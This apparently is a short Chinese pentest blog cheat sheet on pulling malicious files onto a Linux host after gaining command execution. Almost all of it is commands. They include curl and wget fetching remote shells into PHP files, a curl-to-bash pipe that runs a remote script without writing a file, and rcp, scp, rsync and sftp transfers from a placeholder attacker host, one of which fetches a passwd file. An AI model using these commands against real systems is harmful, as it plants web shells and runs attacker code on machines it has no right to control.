Linux命令执行上传恶意文件总结 0x01 curl写文件 1curl -fsSL http://x.x.x.x:8080/test.txt > 1.php 无文件执行命令 1curl -fsSL http://x.x.x.x:8080/test.sh | bash 0x02 wget1wget http://x.x.x.x:8080/shell.txt -O /tmp/x.php 0x03 rcp1rcp [email protected]:./testfile testfile 0x04 scp1scp username@servername:/path/filename /tmp/filename 0x05 rsync1rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt 0x06 sftp1234sftp [email protected] <<EOFget /tmp/2.txtquitEOF pentest 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处! log4j远程代码执行复现 Previous 命令注入绕过方式总结 Next